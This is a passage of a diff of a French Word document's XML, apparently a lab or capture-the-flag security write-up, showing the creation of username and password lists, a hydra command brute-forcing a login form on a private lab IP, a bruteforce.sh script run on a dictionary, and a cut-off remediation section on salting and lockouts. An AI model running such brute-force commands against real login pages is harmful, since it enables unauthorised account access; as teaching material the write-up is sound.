+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Créons</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> les fichiers </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>Créeons</w:t>
+        <w:t>users</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve"> les fichiers </w:t>
+        <w:t xml:space="preserve"> et </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>users</w:t>
+        <w:t>passwords</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve"> et </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> afin de récupérer ceux-ci :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>passwords</w:t>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>echo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> afin de récupérer ceux-ci :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> -e "root\</w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -5539,6 +5585,33 @@
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
+        <w:t>nadmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>" &gt; users.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
         <w:t>echo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -5548,7 +5621,7 @@
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -e "root\</w:t>
+        <w:t xml:space="preserve"> -e "</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5557,6 +5630,42 @@
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
+        <w:t>fortytwo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>nalbatroz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
         <w:t>nadmin</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -5566,15 +5675,42 @@
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>" &gt; users.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>npassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>" &gt; passwords.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
@@ -5584,7 +5720,7 @@
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>echo</w:t>
+        <w:t>hydra</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5593,7 +5729,7 @@
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -e "</w:t>
+        <w:t xml:space="preserve"> -L users.txt -P passwords.txt 192.168.10.22 http-post-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5602,7 +5738,7 @@
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>fortytwo</w:t>
+        <w:t>form</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5611,142 +5747,35 @@
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> "/index.php?page=signin:username=^USER^&amp;password=^PASS^&amp;Login=Login:F=Wrong"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>nalbatroz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>nadmin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>npassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>" &gt; passwords.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>hydra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -L users.txt -P passwords.txt 192.168.10.22 http-post-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>form</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "/index.php?page=signin:username=^USER^&amp;password=^PASS^&amp;Login=Login:F=Wrong"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AD7C08" wp14:editId="68E326DA">
-            <wp:extent cx="2990850" cy="1771650"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AD7C08" wp14:editId="5D2FF80E">
+            <wp:extent cx="2828925" cy="1675733"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
             <wp:docPr id="2078591015" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -5759,7 +5788,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId50"/>
+                    <a:blip r:embed="rId51"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5767,7 +5796,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2990850" cy="1771650"/>
+                      <a:ext cx="2834643" cy="1679120"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5780,8 +5809,459 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nano bruteforce.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04D2FC8E" wp14:editId="24F2C482">
+            <wp:extent cx="5276850" cy="1395992"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="971769798" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="971769798" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId52"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5279542" cy="1396704"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nano dictionary.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E455A2" wp14:editId="4238C6C1">
+            <wp:extent cx="3869306" cy="5085715"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="18547809" name="Image 1" descr="Une image contenant capture d’écran, texte, affichage&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="18547809" name="Image 1" descr="Une image contenant capture d’écran, texte, affichage&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId53"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3875714" cy="5094138"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>chmod +x bruteforce.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>./bruteforce.sh dictionary.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C67427" wp14:editId="3DA5D8F8">
+            <wp:extent cx="5760720" cy="409575"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="746232570" name="Image 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="746232570" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId54"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="409575"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>REMEDIATION</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Pour remédier à cette faille de scéurité il convient de :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Implémentation d'un sel (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>salt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>) :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Pour rendre les dictionnaires de mots de passe inutiles si la base de données est fuitée.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Verrouillage exponentiel :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Augmenter le temps d'attente entre deux tentatives après chaque échec</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
